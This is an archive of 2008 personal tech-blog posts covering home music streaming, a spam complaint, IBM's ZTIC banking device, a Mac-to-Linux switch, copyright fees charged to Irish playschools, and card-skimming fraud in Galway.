Author: Justin

Justin Mason, the author of this weblog.

Listening to music over wifi?

Published December 16, 2008

Hey lazyweb! Long time, no write.

I'm wondering what setup people use to deal with the following situation. Upstairs, I have an Ubuntu 8.04 server with 71GB of MP3s. Downstairs, I have a stereo system. In between the two is a wireless network. How can I listen to the music downstairs, without simply copying the lot (or subsets thereof) onto a local disk on some appliance down there?

Currently, I'm using a VNC client on a Nokia 770 to control a JuK window on the server. This works great, believe it or not! KDE 3 can be coaxed into providing a fantastic UI for a small touchscreen. This then uses Pulseaudio to transmit the sound output using the ESD protocol over TCP to the ESD server on the N770, and the N770 plays back the sound.

Until a few months ago, this worked great. However, something (either hardware changes, network topology changes, or an upgrade to Ubuntu 8.04 on the server) has resulted in effective bitrates between the server and the N770 dropping frequently -- hence the audio drops out or changes pitch, rendering it unlistenable :(

I've tried using UPNP servers (specifically mediatomb, ushare, and Twonkymedia), with the built-in Media Streamer app on the N770. All fail. MP3s cut off near the end, M3U playlists aren't supported, and sometimes Media Streamer just locks up. In addition it's pretty messy trying to get the UPNP servers to notice changes to the MP3 collection.

I've also tried using Squeezecenter (nee Slimserver), but the MP3 stream playback support on the N770 is pretty atrocious; there are audible decoding artifacts.

So -- anyone got a suggestion? Even something involving iTunes might be helpful -- as long as it can at least preserve the Linux server. I'm unlikely to host the full MP3 collection on anything else...

Recession Hits The Digital Depot

Published November 26, 2008

The Digital Depot is 'an innovative, state-of-the-art building specifically designed to meet the needs of fast growing digital media companies [...] developed as a joint initiative of Enterprise Ireland, Dublin City Council and The Digital Hub Development Agency.' Generally, it's a pretty nice place to work, and a great resource for startups and small tech companies.

However, recently, it looks like they've been embarking on some innovative, state-of-the-art cost-cutting exercises.

There's a little canteen area, for companies to make tea and coffee, wash up their mugs, etc. Check out this snapshot from the canteen this morning, courtesy of JK's phone cam:

Notice anything odd about that bottle of washing-up liquid?

Yum yum! Nothing nicer than washing your mug with a dash of toilet cleaner.

Dumb eco-questions you were afraid to ask

Published November 19, 2008

New Scientist have a great article up this week entitled 'Dumb eco-questions you were afraid to ask', including:

Q: Does switching from bus to bike really have any effect? After all, cycling isn't completely carbon neutral because I've got to eat to fuel my legs.

A: You are much better off cycling. A 12-kilometre round commute on a bus or subway train is reckoned to generate 164 kilograms of carbon per commuter per year. Somebody cycling that distance would burn about 50,000 calories a year - roughly the amount of energy in 22 kilograms of brown bread. A kilo of brown bread has a carbon footprint of about 1.1 kilograms, so switching from public transport to a bike saves about 140 kilograms of carbon emissions per year -- although this only really works if enough people cycle to allow public transport providers to reduce the number of buses and trains they run.

Also included: 'How clean does the pizza box/can/bottle have to be for it to be recyclable?'; 'Are laminated juice cartons recyclable?'; 'What's worse, the CO2 put out by a gas-fuelled car or the environmental effects of hybrid-car batteries?'; 'Can I put window envelopes in the paper recycling?' and many more. Check it out...

VisitWicklow.ie: Spammers

Published November 17, 2008

I think I just got my first spam from a government body! Specifically, VisitWicklow.ie spam from Wicklow County Tourism. It says:

Wicklow County Tourism is launching its sparkling 2008 Christmas campaign this month, with an extensive festive section on our website www.visitwicklow.ie/xmas . Here you will find all the information you need about what is happening in the Garden County this season including Christmas parties, seasonal events, carol singing, festive markets, Santa visits, great accommodation packages etc.

It was sent to a spamtrap address, scraped from an old mail archive. This address is a dedicated spamtrap; I've never used it for non-spam-trapping purposes, nor has it ever opted-in to receive mail. So there was no question that I granted permission to anyone to mail it.

The address delivers mail to my personal account -- that's what I do with my spamtraps, until their volumes get too high. So it still qualifies as a "personal email address". Here's the full spam with all headers intact.

It appears the message originated at IP address 87.192.126.62:

inetnum:        87.192.126.32 - 87.192.126.63
netname:        IBIS-PA-NET
descr:          BreezeMax-KilpooleHill-Comm-E 3MB 24:1 (2)
country:        IE
admin-c:        IRA6-RIPE
tech-c:         IRA6-RIPE
status:         Assigned PA
remarks:        Please do NOT send abuse complaints to the contacts listed.
remarks:        Please check remarks on individual inetnum records for abuse contacts, or
remarks:        failing that email abuse reports to abuse@irishbroadband.ie.
mnt-by:         IBIS-MNT
source:         RIPE # Filtered

Kilpoole Hill appears to be south of Wicklow town, just the right spot for a wireless tower used for Irish Broadband access from The Murrough, Wicklow Town (mentioned as the address for Wicklow County Tourism in the mail).

Suggestions? Did anyone else get this? How do I report spam sent by the Wicklow County Tourism Board?

Update: they also hit the Irish Linux User's Group submission address. I wouldn't be surprised if they scraped the addresses of other ILUG subscribers, then...

Déjà Joué

Published November 11, 2008

James Tauber just mentioned on Twitter:

“is it bad that I just saw a photo of Stockholm and immediately recognized a stretch of road from PGR2, rather than when I was actually there?”

This is something I've been thinking about recently. As game graphics improve, the realism levels become close enough to fool our brains into creating something like "real-world" memories for the worlds we're experiencing in gameplay.

For example, when I visited California for the first time, I was stunned by the feelings of familiarity I felt in response to stuff I'd experienced while playing the super-realistic Grand Theft Auto: Vice City; little things like the way traffic lights were mounted above the road, the design of the curbs, etc., the level of detail for which Rockstar received a "Designer of the Year" nomination -- because of this, the streetscape of a typical Californian street was instantly familiar to me.

The same thing happened this weekend, watching footage on TV of Arizona's Monument Valley. Naturally, I've driven a dirt bike around Grand Theft Auto: San Andreas' version of this. ;)

Update: another one is the Pripyat level of Call of Duty 4, which would be extremely familiar to anyone viewing these photos from a real-life visit.

I think this phenomenon needs its own name. "déjà vu" is similar, but different -- that phenomenon occurs when the memory feels erroneously that an experience has previously happened, whereas in this case, the experience has happened -- albeit virtually.

I've come up with a phrase to describe this: "déjà joué". (In French, that's "already played", analogous to the "already seen" of "déjà vu".)

What do you reckon? If you like it, feel free to use it ;)

IBM’s ZTIC

Published November 6, 2008

IBM Zone Trusted Information Channel (ZTIC) -- 'a banking server's display on your keychain'.

IBM has introduced the Zone Trusted Information Channel (ZTIC), a hardware device that can counter [malware attacks on online banking] in an easy-to-use way. The ZTIC is a USB-attached device containing a display and minimal I/O capabilities that runs the full TLS/SSL protocol, thus entirely bypassing the PC's software for all security functionality.

The ZTIC achieves this by registering itself as a USB Mass Storage Device (thus requiring no driver installation) and starting a "pass-through" proxy configured to connect with pre-configured (banking) Websites. After starting the ZTIC proxy, the user opens a Web browser to establish a connection with the bank's Website via the ZTIC. From that moment on, all data transmitted between browser and server pass through the ZTIC; the SSL session is protected by keys maintained only on the ZTIC and, hence, is inaccessible to malware on the PC [...].

In addition, all critical transaction information, such as target account numbers, is automatically detected in the data stream between browser and ZTIC. This critical information is then displayed on the ZTIC for explicit user confirmation: Only after pressing the "OK" button does the TLS/SSL connection continue. If any malware on the PC has inserted incorrect transaction data into the browser, it can be easily detected by the user at this moment.

This seems like quite a nice implementation, I think.

However, key management will be problematic. Each server's public key will need to be stored on the ZTIC, and not be writable/modifiable by the possibly-infected PC, otherwise the "bad guys" could simply insert a cert for a malware proxy server on the PC and perform a man-in-the-middle attack on the TLS session. But for that to be viable, the SSL certs need to change very infrequently, or some new secure procedure to update the certs from a "safe" machine needs to be put in place. Tricky....

Linux: It Just Works

Published November 3, 2008

Here's a nice little (totally subjective!) story for Linux users.

At home, I have a HP Laserjet 1018 printer; it's a dinky little USB laser. When I was setting up my Mac running OSX, I attempted to use it.

A common refrain from Mac users is that MacOS X just works -- attempt to get something working, and the Mac will do the right thing with little friction, compared to the Linux situation which will involve complex config file editing and what-not. If this experience is anything to go by, that's not entirely the case anymore. In fact, the exact opposite applied; when I plugged the printer into the Linux box and ran System -> Administration -> Printing -> New Printer, it "just worked" and I wound up with a working network printer within seconds. No such luck with OSX. Some googling revealed the problem:

In summary, the LJ1018 is just not supported on MacOS X. In order to get it working you need to install a third-party port of the Linux printing components foo2zjs, Foomatic, and Ghostscript, ported to MacOS X, and then get busy with the config file editing and undocumented tweaking and what-not. Ouch.

So there you go. Linux: it just works! ;)

(By the way, I was able to work around it by printing from the Mac to the Linux print server in Postscript; the CUPS print server will transcode PS to the native format.)

The horror! the horror!

Published October 28, 2008

Dead Space came out last week, just in time for Hallowe'en. It's a survival-horror first-person shooter, set in space:

In the bold and often-bloody Dead Space, gamers step into a third-person sci-fi survival horror experience that delivers psychological thrills and gruesome action. Set in the cold blackness of deep space, the atmosphere is soaked with a feeling of tension, dread and sheer terror. In Dead Space, players step into the role of engineer Isaac Clarke – an ordinary man on a seemingly routine mission to fix the communications systems aboard a deep space mining ship. It is not long before Isaac awakes to a living nightmare when he learns that the ship's crew has been ravaged by a vicious alien infestation. He must fight through the dead silence and darkness of deep space to stay alive.

I absolutely love this genre. If you ask me, Resident Evil 4 is one of the best games ever written; perfectly paced, with some truly terrifying villains, plot twists and tension-laden surprises along the way. There's no experience in computer gaming quite so viscerally terrifying as the first time you hear Dr. Salvador's chainsaw revving up in the distance, while trapped in a farmhouse under siege from an army of blood-crazed cultists...

So I got Dead Space last Friday, and have been playing it over the weekend; it's good. Problem is, it's not as good as RE4, but then, when you're up against the best game ever, that's going to be hard to avoid. Actually, to be honest, the first couple of stages feel very reminiscent of RE4, tending towards derivative. Stage 3, however, comes into its own, with flavours of Aliens. Fingers crossed the upward trend continues...

Reading the comments on a Slashdot thread about the game, I came across this tip:

Call of Cthulhu (Score:5, Informative)

I'd say this is the last game that scared the shit out of me. The fact that you don't have any health bar, and that your vision, hearing, and even your heartbeat and breathing pace are affected by the situation can really frighten you. I don't think this game got enough credit. I still haven't finished the game yet.

Here's a nice 10 minute video that gives you the general feeling of the whole game. (minus the 320x240 resolution and lossy quality of course). If you get bored skip to the middle.

The video is pretty compelling, so I did some research. It seems the game is still playable on XBox360, albeit with some wonky sound samples during dialogue. Sounds ok to me. I went onto eBay, and was able to find a copy for 8 UK pounds. bargain!

When I twittered about this, I got these responses:

Me: "Call of Cthulhu" 2005 Xbox title, apparently one of the most terrifying games ever written: 8 UK quid on eBay. woot.

Myles at 2:00pm October 23: You won't be saying woot when your sanity dwindles and you gnaw off your own fingers in an attempt to protect yourself from the Great Old One. [a fair point]

Andrew at 6:56pm October 23: Have you ever played Eternal Darkness for the Gamecube? Really really creepy, and as close to Cthulhu as you can get without paying royalties.

Síofra at 9:06pm October 23: Eternal Darkness - feckin' brilliant. My first videogame addiction and I remember it fondly. The darkness comes....

So I looked up Eternal Darkness: Sanity's Requiem, too. check this review out:

Resident Evil, this game is most absolutely not. What it is, however, to dedicated players who fully explore its length and intricacies, is one of GameCube's absolute best games, and indeed one of the greatest titles we've ever played. [...]

There are insanity effects -- hallucinations that have a major role within the game. [...] if a character's sanity bar drops too low, strange things will begin to happen. Very strange things sometimes. These occurrences are sure to set the dark mood of the adventure and have an impact on the play experience. Going insane too much can create unwanted obstacles for players and in doing so may also endanger one's health and magick supplies. Some of the insanity effects we've encountered have proven very disturbing. Some even attempt to pick at the mind of the player outside of the game universe.

Apparently the walls drip with blood when you start losing your mind. Awesome! IGN gave the game 9.6 out of 10, Metacritic gives it 9th position, 92/100, "universal acclaim", on the all-time high scores list for the Gamecube, and of course, it's playable on the Wii.

Rosco has already promised I can borrow his copy. Sign me up! Looks like I'll be scaring the crap out of myself for a while to come...

the on-demand Windows desktop

Published October 24, 2008

A few days ago, Amazon announced that they would be supporting Windows on EC2. IMO, you'd have to be mad to dream of running a server on that platform, so I was totally like "meh".

However, James Murty pointed out the perfect use case that I'd missed:

Although I much prefer “Unixy” platforms for my own development, I can imagine situations where it would be very handy to have a Windows machine easily available — such as for running those vital but irritating programs that are only made available for Windows. Australian Tax Office, I’m looking at you...

He's spot on! This is a great use case. If you need to do a little 'doze work, a quick recompile, or a connect to another stupid platform-limited service -- indeed, like the Irish tax office's Revenue Online Service, for that matter -- simply fire up a 'doze instance, do your hour's work, SDelete any private files, and shut it down again. All of that will cost 12.5 cents.

This will save me a lot of pain with VMWare, I suspect...

More techie details at RightScale; a trial run.

Switch, ep. 3: revert!

Published October 23, 2008

So, that OSX thing. I'm afraid I've given up on the switch; I'm back on Linux. :(

I got the keyboard mapping working, but Focus-Follows-Mouse and the couple of window-management hotkeys I rely on were impossible to work around.

Focus-Follows-Mouse is emulated by iTerm, but every time you switch to an X11 app or to Firefox, a click is required. This app-specific behaviour is jarring and inconsistent.

For some reason, the window-management hotkeys had a tendency to break, or to be disabled by other hotkeys or apps. I never figured out exactly why.

In addition, OSX has a built-in tendency to hibernate once the laptop's lid is closed. I wanted to disable this, for a number of reasons; most importantly, I tend to leave the laptop closed, leaning beside a chair in the TV room, while I'm at work, but there's frequently something I want to SSH in for. I tried Caffeine.app to avoid this, but it failed entirely on my hardware. InsomniaX generally works, but for some reason it tends to turn itself off occasionally for rather random reasons (such as switching to battery power, no matter how briefly, then back again). This was the final straw.

So just over a week ago, I installed Ubuntu on the MacBook Pro, following the documentation on the Ubuntu Wiki. Everything worked!

The Wiki's suggestions were a little hairy to configure -- but then, the OSX experience had been, if anything, less easy. Plus, I know my way around a Linux /etc.

On the Linux side, the Avant Window Navigator is truly excellent, and rivals the Dock nicely, and the Baghira kwin theme gives a pretty good OSX sheen to KDE 3. It's not quite as pretty as OSX, but I'm happy to lose some prettiness for better usability.

Regarding the interface -- the current version of the Linux Synaptics driver supports multi-touch (Apple's patents be damned, seemingly), and all the nice multi-touch tricks supported by most OSX apps work with it too. I'm still working out the optimum settings for this, but it's very configurable, and quite open.

It's fantastic ;) I feel like I'm home again. Sorry, Mac people.

(image: CC-licensed, thanks to Dr Craig)

Bonuses for bankers: business as usual

Published October 23, 2008

Wall Street banks in $70bn staff payout:

Financial workers at Wall Street's top banks are to receive pay deals worth more than $70bn (£40bn) [equivalent to 10% of the US government bail-out package], a substantial proportion of which is expected to be paid in discretionary bonuses, for their work so far this year - despite plunging the global financial system into its worst crisis since the 1929 stock market crash, the Guardian has learned.

Lloyds chief tells staff: you'll still get bonuses:

The chief executive of Lloyds TSB, one of the banks participating in the [UK] £37bn bank bail-out, has promised staff they will receive bonuses this year despite Gordon Brown's promise of a crackdown on bankers' pay following the investment by taxpayers.

In a recorded message to employees, Daniels stressed that the bank faced "very, very few restrictions" in its behaviour despite the injection of up to £5.5bn of taxpayers' funds. "If you think about it, the first restriction was not to pay bonuses. Well Lloyds TSB is in fact going to pay bonuses. I think our staff have done a terrific job this year. There is no reason why we shouldn't."

Now that takes nerve.

Closed phish data costing $326mm per year

Published October 16, 2008

Richard Clayton posted a very interesting article over at Light Blue Touchpaper; he notes:

Tyler Moore and I are presenting another one of our academic phishing papers today at the Anti-Phishing Working Group’s Third eCrime Researchers Summit here in Atlanta, Georgia. The paper “The consequence of non-cooperation in the fight against phishing” (pre-proceedings version here) goes some way to explaining anomalies we found in our previous analysis of phishing website lifetimes. The “take-down” companies reckon to get phishing websites removed within a few hours, whereas our measurements show that the average lifetimes are a few days.

When we examined our data [...] we found that we were receiving “feeds” of phishing website URLs from several different sources — and the “take-down” companies that were passing the data to us were not passing the data to each other.

So it often occurs that take-down company A knows about a phishing website targeting a particular bank, but take-down company B is ignorant of its existence. If it is company B that has the contract for removing sites for that bank then, since they don’t know the website exists, they take no action and the site stays up.

Since we were receiving data feeds from both company A and company B, we knew the site existed and we measured its lifetime — which is much extended. In fact, it’s somewhat of a mystery why it is removed at all! Our best guess is that reports made directly to ISPs trigger removal.

They go on to estimate that 'an extra $326 million per annum is currently being put at risk by the lack of data sharing.'

This is a classic example of how the proprietary mindset fails where it comes to dealing with abuse and criminal activity online. It would be obviously more useful for the public at large if the data were shared between organisations, and published publicly, but if you view your data feed as a key ingredient of your company's proprietary "secret sauce" IP, you are not likely to publish and share it :(

The anti-phishing world appears to be full of this kind of stuff, disappointingly -- probably because of the money-making opportunities available when providing services to big banks -- but anti-spam isn't free of it either.

Mark another one up for open source and open data...

(thanks to ryanr for the pic)

solid Python queueing?

Published October 15, 2008

OK, message queueing has become insufferably trendy. You don't need to tell me, I've known it's the bees knees for 4 years now ;)

The only problem is, there doesn't seem to be a good queue broker written in Python. They're in Java, Perl, more Perl, or Erlang, but a solid, reliable, persistent queueing backend in Python is nowhere to be found, as far as I can see. Work is a mainly-Python shop, and while we can deploy other languages to our production, staging and test grids easily enough, it's a lot easier to do developer-desktop testing if we had an all-Python queue backend.

Am I missing one?

Dublinr Exhibition

Published October 14, 2008

Dublin is a city that, photographically at least, can be reduced to a set of clichés, but a new exhibition offers a fresh, vibrant perspective of the Irish Capital. Dublinr is organised by a group of photographers that came together through the photo sharing website Flickr.

The exhibition opens at 6.00pm on Wednesday 5 November, runs until Sunday 9, from 11:00am – 6:30pm daily, and admission is free.

The Joinery Gallery | Arbour Hill | Stoneybatter | Dublin 7.

Some fantastic local photographers, including Andy Sheridan, whose work I've been following for a couple of months now; and a good location. D7 is full of good stuff nowadays -- in fact, ever since I moved out ;)

IWA post-mortem

Published October 13, 2008

I didn't win a Web Award -- but then, given the competition from a couple of very professional news organisations, I really wasn't expecting to ;) Silicon Republic won, and rightly so. Good on 'em.

I had a great night nonetheless, hanging out with Vishal, Walter (who won his category!), Conor O'Neill, Jason and a bunch of others.

Thanks to Moviestar.ie and BH Consulting for their sponsorship of a great event -- marketing money well-spent, I suspect. Extra thanks to Moviestar for the freebie DVD player. And thanks of course to the mighty Mulley for organising the whole thing -- at this stage he's a finely-honed events machine!

Want to eat on RTE’s HEAT?

Published October 9, 2008

Here's an interesting offer -- be a restaurant critic/reviewer for RTE's cooking reality show, HEAT:

Ireland's top amateur chefs battle it out in our kitchen, each preparing a three course meal to impress the hardest critics; the paying diners. Mentored by Kevin Thornton and Kevin Dundon, these amateurs have a chance to shock or shine. Who wins, who looses (jm: sic), its all down to you. Come eat in the Heat Restaurant and decide who is Ireland's newest culinary talent.

The restaurant is located in Ely HQ, on Hanover Quay. All three course meals, inc teas and coffees are €30 pp. Drinks are separate.

To dine at Heat, please email diners /at/ loosehorse.ie or call 01 613 6052 with your contact details and your preferred evening. Heat is open for business on Sunday the 19th of October, Sunday the 26th of October, Sunday the 2nd of November, Sunday the 9th of November, and Sunday the 16th of November.

Please note: The evening is being recorded for RTE so if you want to keep a low profile, please consider. Vegetarians, strange allergies and odd requests may or may not be accommodated as Heat has a limited menu and may not always be able to accommodate specific food requirements.

Bon Appetit!

Going to the Web Awards

Published October 9, 2008

So, the Irish Web Awards are happening on Saturday night -- I'm booked and looking forward to it! Say "hi" if you're there and spot my ugly mug ;)

MPLC fail to shake down Irish playschools

Published October 7, 2008

Oh, the irony. According to The Sunday Times, a body called the Motion Picture Licensing Company sent letters to 2,500 Irish playschools (aka kindergartens), demanding payment for children watching DVDs on their premises -- a fee of EUR 3, plus 17.5% VAT, per child per year:

Playschools have been given an unexpected lesson on copyright law after a company representing Hollywood studios demanded that each child pay a fee of €3 plus 17.5% VAT per year to watch DVDs in their playgroup.

The Motion Picture Licensing Company (MPLC), which collects royalties on behalf of companies such as Walt Disney, Universal and 20th Century Fox, wrote to 2,500 playschools last month warning that it is illegal to show copyrighted DVDs in public without the correct license.

The letter was sent with the approval of the Irish Preschool Play Association (IPPA), which represents the schools and their 50,000 children. The MPLC had wanted €10 plus VAT per year for each child, but the IPPA negotiated for the lower fee.

Unsurprisingly, playschool owners are freaking out:

“To be honest, when I got the letter with the IPPA newsletter I laughed and binned it,” said Paula Doran, manager of Kiddies Korner, a community playschool in Shankill, south Dublin. “If we brought in something like that the parents would have to pick up the costs. But I don’t like the way they went about it — once you signed up they’d automatically take money out of your account every year.”

“I don’t think too many judges would come down hard on a playschool over this,” she said. “We would rarely show DVDs anyway because it’s frowned upon — kids get enough TV at home. The odd time we would pretend to go to the cinema. We give the children tickets and they watch 20 minutes of Snow White, Fireman Sam or SpongeBob.”

Here's the funny part -- it appears the MPLC failed to take note of its own legal requirements, and is not legally licensed to issue ~~shakedown~~ demands for fees in Ireland:

The MPLC had failed to register with the Irish Patent Office as a copyright licensing body. Under the 2000 Copyright Act, royalty collectors such as the Irish Music Rights Organisation (IMRO) and Phonographic Performance Ireland (PPI) are required to register before they can collect fees. A spokesman for the Patent Office said that if an organisation collects money but hasn’t registered it may be fined or staff may be jailed if a complaint is made and it is found guilty.

Crazily, it sounds like the IPPA didn't find this out from their own legal advisors:

Irene Gunning, IPPA’s chief executive, said she was disappointed with the MPLC. “We acted in good faith with this organisation and felt we were doing our members good by negotiating them down from €10 per child,” said Gunning. “I feel misled by them now. It is only through an alert mother that we became aware that they need to be registered.”

oh dear. Let's hear it for alert mothers, I guess. Anyway, expect more similar shakedowns once the MPLC get their little licensing oopsie sorted out:

The MPLC only began operating in Ireland in recent months, after setting up in Britain in 2003. It is also targeting other sectors such as coach operators, which occasionally show movies in public.

More coverage at Techdirt, Ars Technica, and TorrentFreak.

(Image credit: smithco on Flickr. thanks!)

Switch ep. 2: the keyboard

Published September 28, 2008

Well, some bits of this are easy: here's a MacOS X version of GVim and Vim, which works nicely, is easy to install, and is simply vim/gvim. Great stuff!

But some bits are harder. Remember I was complaining about that silly ± / § key in the top corner of UK/Irish MacBook Pro keyboards? Some investigation reveals that I'm far from alone in this:

'it fucks up application switching'

'I hate my MacBook Pro'

a forum post looking for help

another forum post

There are a number of apps that offer key remapping, but for no apparent reason they limit themselves to "popular" remappings only, such as swapping the Control and Caps-Lock keys etc. I presume this is because that was easy to code ;)

The one that does work fully is Ukelele. Watch out though -- it comes with a raft of caveats. It's buggy, at least dealing with my MBP keyboard under OSX 10.5.5; the "Copy Key" functionality doesn't work, and you need to start using a key mapping file from the Ukelele package, not a system one or one you've downloaded, otherwise it'll silently produce an output file that doesn't recognise any keys at all. On top of this, each time you make changes, you need to log out and log back in again for them to try them out. (Small mercies: at least you don't need to do a full reboot, I suppose.)

I'm not impressed by this whole keyboard issue. If you look at photos of the US MacBook Pro keyboard, it's clear that it doesn't have the stunted tetris-style Enter and Left-Shift keys that the UK/Irish one does. It also has the tilde key in the normal place, the top left, instead of some bizarre symbol that isn't even used in this keyboard's locale, and as Ash Searle noted, when you're a developer, the # is a hell of a lot more useful than the £ symbol. They've basically screwed with a good US keyboard design to bodge in a few extra keys they needed to deal with the tricky European corner cases.

All that would be relatively minor, however, if I could remap the keys to suit my tastes -- but it was pretty damn tricky to do that. Key remapping needs to be an easy feature!

~~I'm still working on the fixed key layout file, but I may post it here once it's finished to save other Googlers the bother...~~

Update:: here's the fixed key layout file:

Irish Fixed.keylayout

Save that to ~/Library/Keyboard Layouts/ , then open System Preferences -> International, select Input Menu, and choose Irish Fixed from the list, and ensure “Show input menu in the menu bar” is on. Close that window, then select “Irish Fixed” from the input menu left of the clock on the menu bar. Log out, and log back in again, and the keys should be sane…

(thanks to Sonic Julez for the MBP key image)

Shortlisted for an Irish Web Award

Published September 24, 2008

Crazy! Somehow or other, this blog has made the shortlist for "Best Technology Site" at the Irish Web Awards 2008, up against TechCentral, Silicon Republic, Camara, and Robin Blandford's ByteSurgery blog. I have no idea how this happened, given the quality of the sites I'm up against -- two of them are even proper news sites, with journalists! ;)

I've registered for the Oct 11 event; looking forward to it now...

My Trial Switch, ep. I

Published September 23, 2008

As previously noted, I've just bought myself a nice shiny MacBook Pro, to replace an old reliable 5-year-old Thinkpad T40, which ran Linux.

Initially, I was contemplating installing Linux on this one too, and dual-booting. But right now, I've decided to give MacOS X a go -- why not? I find it's worthwhile updating aspects of my quotidian computing environment every now and again, and it seems everyone's doing it. ;) I'll log my experience on this blog as I go along.

(Worth noting that this isn't my first Mac; back in 1990, I was the proud owner of a free Macintosh Plus for a year, courtesy of TCD's "Project Mac" collaboration with Apple Ireland. I wrote a great Mandelbrot Set explorer app.)

First off, the good news: the hardware is very nice indeed. It's light in weight, esp. compared to my T61p work laptop, the screen clarity is fantastic, and the CPU fairly zooms along -- unsurprisingly, given that the T40 was 5 years old.

In addition, the multi-touch touchpad is wonderful; I'm looking forward to lots more multi-touch features.

Unfortunately, some of the other hardware design decisions were pretty wonky. By default it's quite tricky to keep the laptop running with the lid closed -- it seems a decision was made to use passive cooling via the keyboard, so once the lid is closed, that heat cannot escape, causing overheating. There's a third-party extension I can install to allow it anyway, but it's festooned with warnings to overclock the fan speed to make up for it... ugh. Since I need the ability to be able to remotely login to my laptop from work if I should happen to forget something, or to kick off a long transfer before I come home, this means I have to leave the laptop open permanently, which I didn't want to do.

In addition, I initially thought my brightness control was broken, since the laptop screen fluctuates in brightness continually. Turns out this is a feature, responding to ambient light -- a poorly-documented one, but at least it's easy to turn off in System Preferences once you know it's there.

(Unfortunately, a lot of MacOS seems to consist of poorly-documented features that are hidden "for my own good". The concept of switching seems to involve me abdicating a good deal of what I'd consider adult control of the machine, to the cult of Steve Who Knows Better. This is taking some getting used to.)

On to the software... what's getting my goat right now are as follows:

Inability to remap keys (CapsLock key, the useless "+-" key, a lack of "spare" keys for scripted actions)

Up in the top left corner of "international" MacBook keyboards, there's a useless key with a "+-" and double-S symbol on it. I don't think I've ever typed those symbols in my entire life. I want a ~ there, since that's where the ~ key lives, but for some reason, MacOS doesn't include keyboard-remapping functionality to the same level as X11's wonderful "xmodmap". It seems this third-party app might allow me to do that, or maybe something called 'KeyRemap4Macbook'?

This Tao Of Mac HOWTO seems helpful on how to support the "Home"/"End" keys, for external keyboard use.

Focus Follows Mouse

This is a frequent complaint among UNIX-to-Mac switchers. It seems that some apps do a hacky version of it, but then you've got this inconsistent thing where you lose track of which apps will automatically pick up focus (Terminal, iTerm) and which ones need a click first (Firefox, indeed everything else). Unfortunately, it seems an app called CodeTek VirtualDesktop would have fixed it, but seems to have been abandoned. :(

Programmable Hotkeys

I use a few hotkeys to do quick window-control actions without involving the mouse; in particular, F1 brings a window to the front, F2 pushes it to the back, F12 minimizes a window, Ctrl-Alt-LeftArrow moves a window half a screen left, and Ctrl-Alt-RightArrow moves a window half a screen to the right. Those are pretty simple, but effective.

This collection of Applescript files, in conjunction with Quicksilver, look like I may be able to do something similar on the Mac. Here's hoping. LifeHacker suggests that the default for minimize is Cmd-M, so that's what I need to remap from, at least...

This is a big issue -- Dan Kulp had a lot of hot-key-related woes, and wound up going back to Linux as a result. Evan reported the same. I like the idea of MacOS, but my tendonitis-afflicted wrists need their little shortcuts; I'm not willing to compromise on avoiding mouse usage in this way.

(by the way, in order to get F1/F2/F12 back, check the "Use the F1-F12 keys to control software features" box in the Keyboard control panel. Thanks to this page for that tip; it has a few other good tips for UNIX switchers, too.)

Upgrades and Software

So, there's two main contenders for the "apt-get for Mac" throne -- Fink vs MacPorts. Fink takes the Debian approach of downloading binary packages, while MacPorts compiles them from source, BSD/Gentoo-style, on your machine. Since I'm not looking at the source, or picking build parameters, or auditing the code for security issues there and then, I don't see the need to build it -- Fink wins.

One thing though -- the installer for Fink informed me that I needed to run "Repair Permissions", which took a while, and found some things that had somehow already been modified from their system defaults, I'm not sure why. This left me slightly mystified. I then was later told that this is now considered 'voodoo'. wtf.

Mind you, Daring Fireball suggests that the Mac software update are so poorly implemented that they require essentially rebooting in single-user mode, which sounds frankly terrifying. I hope that's not the case.

BTW, it's worth noting that IMO, AWN is as nice as -- possibly nicer than -- the Dock. ;)

Anyway, that's post #1 in a series. Let's see how I get on from here. (thanks to Aman, Craig and Paddy for various tips so far!)

Longlisted!

Published September 16, 2008

Looks like I've been longlisted for Best Technology Site in the Irish Web Awards 2008, twice, both for taint.org and twit.ie. Cheers to whoever nominated me -- I'm honoured!

AWS event in Dublin’s Digital Hub

Published September 4, 2008

Brian Scanlan mailed me with this blurb, worth blogging for any AWS users in the Dublin area:

Are you a software developer or IT professional working in the Dublin area?

Would you like to learn more about Amazon Web Services?

Amazon spent over ten years developing a world-class technology and content platform that powers Amazon web sites for millions of customers daily. Most people think "Amazon.com" when they hear the work; however developers are excited to learn that there is a separate arm of the company, known as Amazon Web Services or AWS.

Using AWS, developers can build software applications leveraging the same robust, scalable and reliable technology that powers Amazon's retail business.

Amazon Data Services Ireland are delighted to welcome Simone Brunozzi (simoneb at amazon.com), AWS Evangelist for Europe, to Dublin, where he will give an overview of Amazon Web Services, including S3, EC2 and EBS, SimpleDB and more.

Tuesday 16th September 2008 at 7pm, The Digital Exchange Auditorium, Crane Street, Dublin 8

Maps and directions to the venue are here. Refreshments will be served.

All welcome - but places are limited, so please sign-up by mailing aws-dublin-event at amazon.com before Thursday 11th September.

I have no connection to this; not even sure if I'll be going, as I went to the last one anyway and it was a bit short on technical tips ;) . But worth blogging anyway.

Another POS skimming fraud in Galway

Published September 1, 2008

This is a little late, since I was off on holliers when it came to light -- Galway News reports 'hundreds hit by skimming scam':

The account details of shoppers who used credit or laser cards to pay for their groceries and other items in a number of Galway shops and supermarkets were illegally skimmed by a gang who apparently managed to interfere with the Chip & PIN terminals at the stores’ check-out counters.

The Irish Times story:

However, it has emerged some cardholders had several thousand euro taken from their accounts overseas before they realised what was happening and alerted their card provider. And it is feared that thousands of other customers do not yet realise their cards have been cloned. Garda sources have confirmed the case involves thousands of cards.

The Galway investigation is centred on one large shop in the county. Gardaí believe several thousand cards have had all of their details skimmed, including pin numbers, over the past month. Some of the cards have already been cloned and used in Canada and other countries where, unlike Ireland, chip and pin protective technology is not in use.

In the Galway case [...] Detectives are working on the theory that somebody in the Galway shop may have facilitated the card skimming for an Eastern European crime syndicate.

Gardaí do not believe the payment terminals were tampered with. Gardaí have recovered CCTV images of suspects from in-store cameras.

In the past, cards have been copied using very small hand held devices through which a card is quickly and discreetly skimmed at the point of payment. The information is then copied, or cloned, onto a blank card which is then used like a regular payment card.

Skimming devices around the size of a cigarette lighter can store details from thousands of cards.

The payment terminals from the Galway shop have been taken by gardaí for technical examination as a precaution. The Garda Bureau of Fraud Investigation is leading the inquiry.

This Boards.IE thread is a real eye-opener, containing lots of reports from victims of this scam -- many reports saying that they suspect it was in Joyces' Supermarket in Knocknacarra, although one poster reckons 'there are now over 20 suspect premises in Galway City and outskirts'. blimey.

On a related note -- while shopping in my local supermarket at the weekend, I was pleased to note that when I paid with my credit card, I was asked to sign the slip, instead of using Chip-and-PIN. So it looks like at least one retailer is taking additional care.

